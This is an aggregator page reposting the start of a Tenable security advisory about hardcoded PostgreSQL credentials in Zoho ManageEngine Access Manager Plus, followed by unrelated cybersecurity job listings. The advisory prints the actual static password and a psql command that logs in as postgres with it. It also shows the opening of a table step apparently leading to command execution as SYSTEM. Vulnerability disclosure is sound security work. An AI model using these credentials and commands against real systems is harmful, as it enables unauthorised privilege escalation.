April 25, 2023, 7:01 p.m. | Jimi Sebree

Tenable Research Advisories www.tenable.com

Zoho ManageEngine Disclosure of Hardcoded Credentials

Static credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309. These credentials could allow a malicious actor to modify configuration data that would escalate their permissions from that of a low-privileged user to an Administrative user.


The PostgreSQL database server used in AMP is run under the SYSTEM account:

C:\Program Files\ManageEngine\AMP\pgsql\bin>set PGPASSWORD=Stonebraker&& psql -h 127.0.0.1 -p 4567 -d AMP -U postgres -q

AMP=# DROP TABLE IF EXISTS cmd_exec; …

access actor amp build configuration credentials data database disclosure hardcoded hardcoded credentials low malicious manageengine manager permissions postgresql privileged privileged user server zoho zoho manageengine

CyberSOC Technical Lead

@ Integrity360 | Sandyford, Dublin, Ireland

Cyber Security Strategy Consultant

@ Capco | New York City

Cyber Security Senior Consultant

@ Capco | Chicago, IL

Sr. Product Manager

@ MixMode | Remote, US

Corporate Intern - Information Security (Year Round)

@ Associated Bank | US WI Remote

Senior Offensive Security Engineer

@ CoStar Group | US-DC Washington, DC